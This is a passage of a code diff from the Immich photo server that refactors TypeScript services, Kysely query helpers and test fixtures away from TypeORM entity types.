const items = assets.map((asset) => ({ value: asset.exifInfo!.city!, data: mapAsset(asset, { auth }) }));
|
||||||
return [{ fieldName: cities.fieldName, items }];
|
return [{ fieldName: cities.fieldName, items }];
|
||||||
}
|
}
|
||||||
@ -139,7 +138,7 @@ export class SearchService extends BaseService {
|
|||||||
return [auth.user.id, ...partnerIds];
|
return [auth.user.id, ...partnerIds];
|
||||||
}
|
}
|
||||||
|
|
||||||
private mapResponse(assets: AssetEntity[], nextPage: string | null, options: AssetMapOptions): SearchResponseDto {
|
private mapResponse(assets: MapAsset[], nextPage: string | null, options: AssetMapOptions): SearchResponseDto {
|
||||||
return {
|
return {
|
||||||
albums: { total: 0, count: 0, items: [], facets: [] },
|
albums: { total: 0, count: 0, items: [], facets: [] },
|
||||||
assets: {
|
assets: {
|
||||||
|
@ -244,7 +244,7 @@ describe(SharedLinkService.name, () => {
|
|||||||
await sut.remove(authStub.user1, sharedLinkStub.valid.id);
|
await sut.remove(authStub.user1, sharedLinkStub.valid.id);
|
||||||
|
|
||||||
expect(mocks.sharedLink.get).toHaveBeenCalledWith(authStub.user1.user.id, sharedLinkStub.valid.id);
|
expect(mocks.sharedLink.get).toHaveBeenCalledWith(authStub.user1.user.id, sharedLinkStub.valid.id);
|
||||||
expect(mocks.sharedLink.remove).toHaveBeenCalledWith(sharedLinkStub.valid);
|
expect(mocks.sharedLink.remove).toHaveBeenCalledWith(sharedLinkStub.valid.id);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
@ -333,8 +333,7 @@ describe(SharedLinkService.name, () => {
|
|||||||
});
|
});
|
||||||
|
|
||||||
it('should return metadata tags with a default image path if the asset id is not set', async () => {
|
it('should return metadata tags with a default image path if the asset id is not set', async () => {
|
||||||
mocks.sharedLink.get.mockResolvedValue({ ...sharedLinkStub.individual, album: undefined, assets: [] });
|
mocks.sharedLink.get.mockResolvedValue({ ...sharedLinkStub.individual, album: null, assets: [] });
|
||||||
|
|
||||||
await expect(sut.getMetadataTags(authStub.adminSharedLink)).resolves.toEqual({
|
await expect(sut.getMetadataTags(authStub.adminSharedLink)).resolves.toEqual({
|
||||||
description: '0 shared photos & videos',
|
description: '0 shared photos & videos',
|
||||||
imageUrl: `https://my.immich.app/feature-panel.png`,
|
imageUrl: `https://my.immich.app/feature-panel.png`,
|
||||||
|
@ -1,4 +1,5 @@
|
|||||||
import { BadRequestException, ForbiddenException, Injectable, UnauthorizedException } from '@nestjs/common';
|
import { BadRequestException, ForbiddenException, Injectable, UnauthorizedException } from '@nestjs/common';
|
||||||
|
import { SharedLink } from 'src/database';
|
||||||
import { AssetIdErrorReason, AssetIdsResponseDto } from 'src/dtos/asset-ids.response.dto';
|
import { AssetIdErrorReason, AssetIdsResponseDto } from 'src/dtos/asset-ids.response.dto';
|
||||||
import { AssetIdsDto } from 'src/dtos/asset.dto';
|
import { AssetIdsDto } from 'src/dtos/asset.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
@ -11,7 +12,6 @@ import {
|
|||||||
SharedLinkResponseDto,
|
SharedLinkResponseDto,
|
||||||
SharedLinkSearchDto,
|
SharedLinkSearchDto,
|
||||||
} from 'src/dtos/shared-link.dto';
|
} from 'src/dtos/shared-link.dto';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { Permission, SharedLinkType } from 'src/enum';
|
import { Permission, SharedLinkType } from 'src/enum';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
import { getExternalDomain, OpenGraphTags } from 'src/utils/misc';
|
import { getExternalDomain, OpenGraphTags } from 'src/utils/misc';
|
||||||
@ -98,7 +98,7 @@ export class SharedLinkService extends BaseService {
|
|||||||
|
|
||||||
async remove(auth: AuthDto, id: string): Promise<void> {
|
async remove(auth: AuthDto, id: string): Promise<void> {
|
||||||
const sharedLink = await this.findOrFail(auth.user.id, id);
|
const sharedLink = await this.findOrFail(auth.user.id, id);
|
||||||
await this.sharedLinkRepository.remove(sharedLink);
|
await this.sharedLinkRepository.remove(sharedLink.id);
|
||||||
}
|
}
|
||||||
|
|
||||||
// TODO: replace `userId` with permissions and access control checks
|
// TODO: replace `userId` with permissions and access control checks
|
||||||
@ -182,7 +182,7 @@ export class SharedLinkService extends BaseService {
|
|||||||
const config = await this.getConfig({ withCache: true });
|
const config = await this.getConfig({ withCache: true });
|
||||||
const sharedLink = await this.findOrFail(auth.sharedLink.userId, auth.sharedLink.id);
|
const sharedLink = await this.findOrFail(auth.sharedLink.userId, auth.sharedLink.id);
|
||||||
const assetId = sharedLink.album?.albumThumbnailAssetId || sharedLink.assets[0]?.id;
|
const assetId = sharedLink.album?.albumThumbnailAssetId || sharedLink.assets[0]?.id;
|
||||||
const assetCount = sharedLink.assets.length > 0 ? sharedLink.assets.length : sharedLink.album?.assets.length || 0;
|
const assetCount = sharedLink.assets.length > 0 ? sharedLink.assets.length : sharedLink.album?.assets?.length || 0;
|
||||||
const imagePath = assetId
|
const imagePath = assetId
|
||||||
? `/api/assets/${assetId}/thumbnail?key=${sharedLink.key.toString('base64url')}`
|
? `/api/assets/${assetId}/thumbnail?key=${sharedLink.key.toString('base64url')}`
|
||||||
: '/feature-panel.png';
|
: '/feature-panel.png';
|
||||||
@ -194,11 +194,11 @@ export class SharedLinkService extends BaseService {
|
|||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
private mapToSharedLink(sharedLink: SharedLinkEntity, { withExif }: { withExif: boolean }) {
|
private mapToSharedLink(sharedLink: SharedLink, { withExif }: { withExif: boolean }) {
|
||||||
return withExif ? mapSharedLink(sharedLink) : mapSharedLinkWithoutMetadata(sharedLink);
|
return withExif ? mapSharedLink(sharedLink) : mapSharedLinkWithoutMetadata(sharedLink);
|
||||||
}
|
}
|
||||||
|
|
||||||
private validateAndRefreshToken(sharedLink: SharedLinkEntity, dto: SharedLinkPasswordDto): string {
|
private validateAndRefreshToken(sharedLink: SharedLink, dto: SharedLinkPasswordDto): string {
|
||||||
const token = this.cryptoRepository.hashSha256(`${sharedLink.id}-${sharedLink.password}`);
|
const token = this.cryptoRepository.hashSha256(`${sharedLink.id}-${sharedLink.password}`);
|
||||||
const sharedLinkTokens = dto.token?.split(',') || [];
|
const sharedLinkTokens = dto.token?.split(',') || [];
|
||||||
if (sharedLink.password !== dto.password && !sharedLinkTokens.includes(token)) {
|
if (sharedLink.password !== dto.password && !sharedLinkTokens.includes(token)) {
|
||||||
|
@ -1,5 +1,4 @@
|
|||||||
import { mapAsset } from 'src/dtos/asset-response.dto';
|
import { mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { SyncService } from 'src/services/sync.service';
|
import { SyncService } from 'src/services/sync.service';
|
||||||
import { assetStub } from 'test/fixtures/asset.stub';
|
import { assetStub } from 'test/fixtures/asset.stub';
|
||||||
import { authStub } from 'test/fixtures/auth.stub';
|
import { authStub } from 'test/fixtures/auth.stub';
|
||||||
@ -63,7 +62,7 @@ describe(SyncService.name, () => {
|
|||||||
it('should return a response requiring a full sync when there are too many changes', async () => {
|
it('should return a response requiring a full sync when there are too many changes', async () => {
|
||||||
mocks.partner.getAll.mockResolvedValue([]);
|
mocks.partner.getAll.mockResolvedValue([]);
|
||||||
mocks.asset.getChangedDeltaSync.mockResolvedValue(
|
mocks.asset.getChangedDeltaSync.mockResolvedValue(
|
||||||
Array.from<AssetEntity>({ length: 10_000 }).fill(assetStub.image),
|
Array.from<typeof assetStub.image>({ length: 10_000 }).fill(assetStub.image),
|
||||||
);
|
);
|
||||||
await expect(
|
await expect(
|
||||||
sut.getDeltaSync(authStub.user1, { updatedAfter: new Date(), userIds: [authStub.user1.user.id] }),
|
sut.getDeltaSync(authStub.user1, { updatedAfter: new Date(), userIds: [authStub.user1.user.id] }),
|
||||||
|
@ -1,7 +1,6 @@
|
|||||||
import { Injectable } from '@nestjs/common';
|
import { Injectable } from '@nestjs/common';
|
||||||
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
|
|
||||||
@Injectable()
|
@Injectable()
|
||||||
@ -12,6 +11,6 @@ export class ViewService extends BaseService {
|
|||||||
|
|
||||||
async getAssetsByOriginalPath(auth: AuthDto, path: string): Promise<AssetResponseDto[]> {
|
async getAssetsByOriginalPath(auth: AuthDto, path: string): Promise<AssetResponseDto[]> {
|
||||||
const assets = await this.viewRepository.getAssetsByOriginalPath(auth.user.id, path);
|
const assets = await this.viewRepository.getAssetsByOriginalPath(auth.user.id, path);
|
||||||
return assets.map((asset) => mapAsset(asset as unknown as AssetEntity, { auth }));
|
return assets.map((asset) => mapAsset(asset, { auth }));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -6,6 +6,13 @@ export const processTables: Processor = (builder, items) => {
|
|||||||
for (const {
|
for (const {
|
||||||
item: { options, object },
|
item: { options, object },
|
||||||
} of items.filter((item) => item.type === 'table')) {
|
} of items.filter((item) => item.type === 'table')) {
|
||||||
|
const test = readMetadata(object);
|
||||||
|
if (test) {
|
||||||
|
throw new Error(
|
||||||
|
`Table ${test.name} has already been registered. Does ${object.name} have two @Table() decorators?`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
const tableName = options.name || asSnakeCase(object.name);
|
const tableName = options.name || asSnakeCase(object.name);
|
||||||
|
|
||||||
writeMetadata(object, { name: tableName, options });
|
writeMetadata(object, { name: tableName, options });
|
||||||
|
@ -50,12 +50,8 @@ const asFunctionExpression = (options: FunctionOptions) => {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if ('body' in options) {
|
if ('body' in options) {
|
||||||
sql.push(
|
const body = options.body;
|
||||||
//
|
sql.push(...(body.includes('\n') ? [`AS $$`, ' ' + body.trim(), `$$;`] : [`AS $$${body}$$;`]));
|
||||||
`AS $$`,
|
|
||||||
' ' + options.body.trim(),
|
|
||||||
`$$;`,
|
|
||||||
);
|
|
||||||
}
|
}
|
||||||
|
|
||||||
return sql.join('\n ').trim();
|
return sql.join('\n ').trim();
|
||||||
|
@ -13,11 +13,8 @@ import { PartnerRepository } from 'src/repositories/partner.repository';
|
|||||||
import { IBulkAsset, ImmichFile, UploadFile } from 'src/types';
|
import { IBulkAsset, ImmichFile, UploadFile } from 'src/types';
|
||||||
import { checkAccess } from 'src/utils/access';
|
import { checkAccess } from 'src/utils/access';
|
||||||
|
|
||||||
export const getAssetFile = <T extends { type: AssetFileType }>(
|
export const getAssetFile = (files: AssetFile[], type: AssetFileType | GeneratedImageType) => {
|
||||||
files: T[],
|
return files.find((file) => file.type === type);
|
||||||
type: AssetFileType | GeneratedImageType,
|
|
||||||
) => {
|
|
||||||
return (files || []).find((file) => file.type === type);
|
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getAssetFiles = (files: AssetFile[]) => ({
|
export const getAssetFiles = (files: AssetFile[]) => ({
|
||||||
|
@ -1,15 +1,24 @@
|
|||||||
import {
|
import {
|
||||||
|
DeduplicateJoinsPlugin,
|
||||||
Expression,
|
Expression,
|
||||||
ExpressionBuilder,
|
ExpressionBuilder,
|
||||||
ExpressionWrapper,
|
ExpressionWrapper,
|
||||||
|
Kysely,
|
||||||
KyselyConfig,
|
KyselyConfig,
|
||||||
Nullable,
|
Nullable,
|
||||||
Selectable,
|
Selectable,
|
||||||
|
SelectQueryBuilder,
|
||||||
Simplify,
|
Simplify,
|
||||||
sql,
|
sql,
|
||||||
} from 'kysely';
|
} from 'kysely';
|
||||||
import { PostgresJSDialect } from 'kysely-postgres-js';
|
import { PostgresJSDialect } from 'kysely-postgres-js';
|
||||||
|
import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
|
||||||
import postgres, { Notice } from 'postgres';
|
import postgres, { Notice } from 'postgres';
|
||||||
|
import { columns, Exif, Person } from 'src/database';
|
||||||
|
import { DB } from 'src/db';
|
||||||
|
import { AssetFileType } from 'src/enum';
|
||||||
|
import { TimeBucketSize } from 'src/repositories/asset.repository';
|
||||||
|
import { AssetSearchBuilderOptions } from 'src/repositories/search.repository';
|
||||||
|
|
||||||
type Ssl = 'require' | 'allow' | 'prefer' | 'verify-full' | boolean | object;
|
type Ssl = 'require' | 'allow' | 'prefer' | 'verify-full' | boolean | object;
|
||||||
|
|
||||||
@ -112,3 +121,225 @@ export function toJson<DB, TB extends keyof DB & string, T extends TB | Expressi
|
|||||||
>
|
>
|
||||||
>;
|
>;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
export const ASSET_CHECKSUM_CONSTRAINT = 'UQ_assets_owner_checksum';
|
||||||
|
// TODO come up with a better query that only selects the fields we need
|
||||||
|
|
||||||
|
export function withExif<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
||||||
|
return qb
|
||||||
|
.leftJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif | null>().as('exifInfo'));
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withExifInner<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
||||||
|
return qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif>().as('exifInfo'));
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withSmartSearch<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
||||||
|
return qb
|
||||||
|
.leftJoin('smart_search', 'assets.id', 'smart_search.assetId')
|
||||||
|
.select((eb) => toJson(eb, 'smart_search').as('smartSearch'));
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withFaces(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
|
||||||
|
return jsonArrayFrom(
|
||||||
|
eb
|
||||||
|
.selectFrom('asset_faces')
|
||||||
|
.selectAll('asset_faces')
|
||||||
|
.whereRef('asset_faces.assetId', '=', 'assets.id')
|
||||||
|
.$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
|
||||||
|
).as('faces');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withFiles(eb: ExpressionBuilder<DB, 'assets'>, type?: AssetFileType) {
|
||||||
|
return jsonArrayFrom(
|
||||||
|
eb
|
||||||
|
.selectFrom('asset_files')
|
||||||
|
.select(columns.assetFiles)
|
||||||
|
.whereRef('asset_files.assetId', '=', 'assets.id')
|
||||||
|
.$if(!!type, (qb) => qb.where('asset_files.type', '=', type!)),
|
||||||
|
).as('files');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withFacesAndPeople(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
|
||||||
|
return jsonArrayFrom(
|
||||||
|
eb
|
||||||
|
.selectFrom('asset_faces')
|
||||||
|
.leftJoinLateral(
|
||||||
|
(eb) =>
|
||||||
|
eb.selectFrom('person').selectAll('person').whereRef('asset_faces.personId', '=', 'person.id').as('person'),
|
||||||
|
(join) => join.onTrue(),
|
||||||
|
)
|
||||||
|
.selectAll('asset_faces')
|
||||||
|
.select((eb) => eb.table('person').$castTo<Person>().as('person'))
|
||||||
|
.whereRef('asset_faces.assetId', '=', 'assets.id')
|
||||||
|
.$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
|
||||||
|
).as('faces');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function hasPeople<O>(qb: SelectQueryBuilder<DB, 'assets', O>, personIds: string[]) {
|
||||||
|
return qb.innerJoin(
|
||||||
|
(eb) =>
|
||||||
|
eb
|
||||||
|
.selectFrom('asset_faces')
|
||||||
|
.select('assetId')
|
||||||
|
.where('personId', '=', anyUuid(personIds!))
|
||||||
|
.where('deletedAt', 'is', null)
|
||||||
|
.groupBy('assetId')
|
||||||
|
.having((eb) => eb.fn.count('personId').distinct(), '=', personIds.length)
|
||||||
|
.as('has_people'),
|
||||||
|
(join) => join.onRef('has_people.assetId', '=', 'assets.id'),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
export function hasTags<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagIds: string[]) {
|
||||||
|
return qb.innerJoin(
|
||||||
|
(eb) =>
|
||||||
|
eb
|
||||||
|
.selectFrom('tag_asset')
|
||||||
|
.select('assetsId')
|
||||||
|
.innerJoin('tags_closure', 'tag_asset.tagsId', 'tags_closure.id_descendant')
|
||||||
|
.where('tags_closure.id_ancestor', '=', anyUuid(tagIds))
|
||||||
|
.groupBy('assetsId')
|
||||||
|
.having((eb) => eb.fn.count('tags_closure.id_ancestor').distinct(), '>=', tagIds.length)
|
||||||
|
.as('has_tags'),
|
||||||
|
(join) => join.onRef('has_tags.assetsId', '=', 'assets.id'),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withOwner(eb: ExpressionBuilder<DB, 'assets'>) {
|
||||||
|
return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'assets.ownerId')).as(
|
||||||
|
'owner',
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withLibrary(eb: ExpressionBuilder<DB, 'assets'>) {
|
||||||
|
return jsonObjectFrom(
|
||||||
|
eb.selectFrom('libraries').selectAll('libraries').whereRef('libraries.id', '=', 'assets.libraryId'),
|
||||||
|
).as('library');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withTags(eb: ExpressionBuilder<DB, 'assets'>) {
|
||||||
|
return jsonArrayFrom(
|
||||||
|
eb
|
||||||
|
.selectFrom('tags')
|
||||||
|
.select(columns.tag)
|
||||||
|
.innerJoin('tag_asset', 'tags.id', 'tag_asset.tagsId')
|
||||||
|
.whereRef('assets.id', '=', 'tag_asset.assetsId'),
|
||||||
|
).as('tags');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function truncatedDate<O>(size: TimeBucketSize) {
|
||||||
|
return sql<O>`date_trunc(${size}, "localDateTime" at time zone 'UTC') at time zone 'UTC'`;
|
||||||
|
}
|
||||||
|
|
||||||
|
export function withTagId<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagId: string) {
|
||||||
|
return qb.where((eb) =>
|
||||||
|
eb.exists(
|
||||||
|
eb
|
||||||
|
.selectFrom('tags_closure')
|
||||||
|
.innerJoin('tag_asset', 'tag_asset.tagsId', 'tags_closure.id_descendant')
|
||||||
|
.whereRef('tag_asset.assetsId', '=', 'assets.id')
|
||||||
|
.where('tags_closure.id_ancestor', '=', tagId),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
const joinDeduplicationPlugin = new DeduplicateJoinsPlugin();
|
||||||
|
/** TODO: This should only be used for search-related queries, not as a general purpose query builder */
|
||||||
|
|
||||||
|
export function searchAssetBuilder(kysely: Kysely<DB>, options: AssetSearchBuilderOptions) {
|
||||||
|
options.isArchived ??= options.withArchived ? undefined : false;
|
||||||
|
options.withDeleted ||= !!(options.trashedAfter || options.trashedBefore || options.isOffline);
|
||||||
|
return kysely
|
||||||
|
.withPlugin(joinDeduplicationPlugin)
|
||||||
|
.selectFrom('assets')
|
||||||
|
.selectAll('assets')
|
||||||
|
.$if(!!options.tagIds && options.tagIds.length > 0, (qb) => hasTags(qb, options.tagIds!))
|
||||||
|
.$if(!!options.personIds && options.personIds.length > 0, (qb) => hasPeople(qb, options.personIds!))
|
||||||
|
.$if(!!options.createdBefore, (qb) => qb.where('assets.createdAt', '<=', options.createdBefore!))
|
||||||
|
.$if(!!options.createdAfter, (qb) => qb.where('assets.createdAt', '>=', options.createdAfter!))
|
||||||
|
.$if(!!options.updatedBefore, (qb) => qb.where('assets.updatedAt', '<=', options.updatedBefore!))
|
||||||
|
.$if(!!options.updatedAfter, (qb) => qb.where('assets.updatedAt', '>=', options.updatedAfter!))
|
||||||
|
.$if(!!options.trashedBefore, (qb) => qb.where('assets.deletedAt', '<=', options.trashedBefore!))
|
||||||
|
.$if(!!options.trashedAfter, (qb) => qb.where('assets.deletedAt', '>=', options.trashedAfter!))
|
||||||
|
.$if(!!options.takenBefore, (qb) => qb.where('assets.fileCreatedAt', '<=', options.takenBefore!))
|
||||||
|
.$if(!!options.takenAfter, (qb) => qb.where('assets.fileCreatedAt', '>=', options.takenAfter!))
|
||||||
|
.$if(options.city !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.city', options.city === null ? 'is' : '=', options.city!),
|
||||||
|
)
|
||||||
|
.$if(options.state !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.state', options.state === null ? 'is' : '=', options.state!),
|
||||||
|
)
|
||||||
|
.$if(options.country !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.country', options.country === null ? 'is' : '=', options.country!),
|
||||||
|
)
|
||||||
|
.$if(options.make !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.make', options.make === null ? 'is' : '=', options.make!),
|
||||||
|
)
|
||||||
|
.$if(options.model !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.model', options.model === null ? 'is' : '=', options.model!),
|
||||||
|
)
|
||||||
|
.$if(options.lensModel !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.lensModel', options.lensModel === null ? 'is' : '=', options.lensModel!),
|
||||||
|
)
|
||||||
|
.$if(options.rating !== undefined, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where('exif.rating', options.rating === null ? 'is' : '=', options.rating!),
|
||||||
|
)
|
||||||
|
.$if(!!options.checksum, (qb) => qb.where('assets.checksum', '=', options.checksum!))
|
||||||
|
.$if(!!options.deviceAssetId, (qb) => qb.where('assets.deviceAssetId', '=', options.deviceAssetId!))
|
||||||
|
.$if(!!options.deviceId, (qb) => qb.where('assets.deviceId', '=', options.deviceId!))
|
||||||
|
.$if(!!options.id, (qb) => qb.where('assets.id', '=', asUuid(options.id!)))
|
||||||
|
.$if(!!options.libraryId, (qb) => qb.where('assets.libraryId', '=', asUuid(options.libraryId!)))
|
||||||
|
.$if(!!options.userIds, (qb) => qb.where('assets.ownerId', '=', anyUuid(options.userIds!)))
|
||||||
|
.$if(!!options.encodedVideoPath, (qb) => qb.where('assets.encodedVideoPath', '=', options.encodedVideoPath!))
|
||||||
|
.$if(!!options.originalPath, (qb) =>
|
||||||
|
qb.where(sql`f_unaccent(assets."originalPath")`, 'ilike', sql`'%' || f_unaccent(${options.originalPath}) || '%'`),
|
||||||
|
)
|
||||||
|
.$if(!!options.originalFileName, (qb) =>
|
||||||
|
qb.where(
|
||||||
|
sql`f_unaccent(assets."originalFileName")`,
|
||||||
|
'ilike',
|
||||||
|
sql`'%' || f_unaccent(${options.originalFileName}) || '%'`,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
.$if(!!options.description, (qb) =>
|
||||||
|
qb
|
||||||
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
|
.where(sql`f_unaccent(exif.description)`, 'ilike', sql`'%' || f_unaccent(${options.description}) || '%'`),
|
||||||
|
)
|
||||||
|
.$if(!!options.type, (qb) => qb.where('assets.type', '=', options.type!))
|
||||||
|
.$if(options.isFavorite !== undefined, (qb) => qb.where('assets.isFavorite', '=', options.isFavorite!))
|
||||||
|
.$if(options.isOffline !== undefined, (qb) => qb.where('assets.isOffline', '=', options.isOffline!))
|
||||||
|
.$if(options.isVisible !== undefined, (qb) => qb.where('assets.isVisible', '=', options.isVisible!))
|
||||||
|
.$if(options.isArchived !== undefined, (qb) => qb.where('assets.isArchived', '=', options.isArchived!))
|
||||||
|
.$if(options.isEncoded !== undefined, (qb) =>
|
||||||
|
qb.where('assets.encodedVideoPath', options.isEncoded ? 'is not' : 'is', null),
|
||||||
|
)
|
||||||
|
.$if(options.isMotion !== undefined, (qb) =>
|
||||||
|
qb.where('assets.livePhotoVideoId', options.isMotion ? 'is not' : 'is', null),
|
||||||
|
)
|
||||||
|
.$if(!!options.isNotInAlbum, (qb) =>
|
||||||
|
qb.where((eb) =>
|
||||||
|
eb.not(eb.exists((eb) => eb.selectFrom('albums_assets_assets').whereRef('assetsId', '=', 'assets.id'))),
|
||||||
|
),
|
||||||
|
)
|
||||||
|
.$if(!!options.withExif, withExifInner)
|
||||||
|
.$if(!!(options.withFaces || options.withPeople || options.personIds), (qb) => qb.select(withFacesAndPeople))
|
||||||
|
.$if(!options.withDeleted, (qb) => qb.where('assets.deletedAt', 'is', null));
|
||||||
|
}
|
||||||
|
22
server/test/fixtures/album.stub.ts
vendored
22
server/test/fixtures/album.stub.ts
vendored
@ -1,11 +1,10 @@
|
|||||||
import { AlbumEntity } from 'src/entities/album.entity';
|
|
||||||
import { AlbumUserRole, AssetOrder } from 'src/enum';
|
import { AlbumUserRole, AssetOrder } from 'src/enum';
|
||||||
import { assetStub } from 'test/fixtures/asset.stub';
|
import { assetStub } from 'test/fixtures/asset.stub';
|
||||||
import { authStub } from 'test/fixtures/auth.stub';
|
import { authStub } from 'test/fixtures/auth.stub';
|
||||||
import { userStub } from 'test/fixtures/user.stub';
|
import { userStub } from 'test/fixtures/user.stub';
|
||||||
|
|
||||||
export const albumStub = {
|
export const albumStub = {
|
||||||
empty: Object.freeze<AlbumEntity>({
|
empty: Object.freeze({
|
||||||
id: 'album-1',
|
id: 'album-1',
|
||||||
albumName: 'Empty album',
|
albumName: 'Empty album',
|
||||||
description: '',
|
description: '',
|
||||||
@ -21,8 +20,9 @@ export const albumStub = {
|
|||||||
albumUsers: [],
|
albumUsers: [],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
sharedWithUser: Object.freeze<AlbumEntity>({
|
sharedWithUser: Object.freeze({
|
||||||
id: 'album-2',
|
id: 'album-2',
|
||||||
albumName: 'Empty album shared with user',
|
albumName: 'Empty album shared with user',
|
||||||
description: '',
|
description: '',
|
||||||
@ -43,8 +43,9 @@ export const albumStub = {
|
|||||||
],
|
],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
sharedWithMultiple: Object.freeze<AlbumEntity>({
|
sharedWithMultiple: Object.freeze({
|
||||||
id: 'album-3',
|
id: 'album-3',
|
||||||
albumName: 'Empty album shared with users',
|
albumName: 'Empty album shared with users',
|
||||||
description: '',
|
description: '',
|
||||||
@ -69,8 +70,9 @@ export const albumStub = {
|
|||||||
],
|
],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
sharedWithAdmin: Object.freeze<AlbumEntity>({
|
sharedWithAdmin: Object.freeze({
|
||||||
id: 'album-3',
|
id: 'album-3',
|
||||||
albumName: 'Empty album shared with admin',
|
albumName: 'Empty album shared with admin',
|
||||||
description: '',
|
description: '',
|
||||||
@ -91,8 +93,9 @@ export const albumStub = {
|
|||||||
],
|
],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
oneAsset: Object.freeze<AlbumEntity>({
|
oneAsset: Object.freeze({
|
||||||
id: 'album-4',
|
id: 'album-4',
|
||||||
albumName: 'Album with one asset',
|
albumName: 'Album with one asset',
|
||||||
description: '',
|
description: '',
|
||||||
@ -108,8 +111,9 @@ export const albumStub = {
|
|||||||
albumUsers: [],
|
albumUsers: [],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
twoAssets: Object.freeze<AlbumEntity>({
|
twoAssets: Object.freeze({
|
||||||
id: 'album-4a',
|
id: 'album-4a',
|
||||||
albumName: 'Album with two assets',
|
albumName: 'Album with two assets',
|
||||||
description: '',
|
description: '',
|
||||||
@ -125,8 +129,9 @@ export const albumStub = {
|
|||||||
albumUsers: [],
|
albumUsers: [],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
emptyWithValidThumbnail: Object.freeze<AlbumEntity>({
|
emptyWithValidThumbnail: Object.freeze({
|
||||||
id: 'album-5',
|
id: 'album-5',
|
||||||
albumName: 'Empty album with valid thumbnail',
|
albumName: 'Empty album with valid thumbnail',
|
||||||
description: '',
|
description: '',
|
||||||
@ -142,5 +147,6 @@ export const albumStub = {
|
|||||||
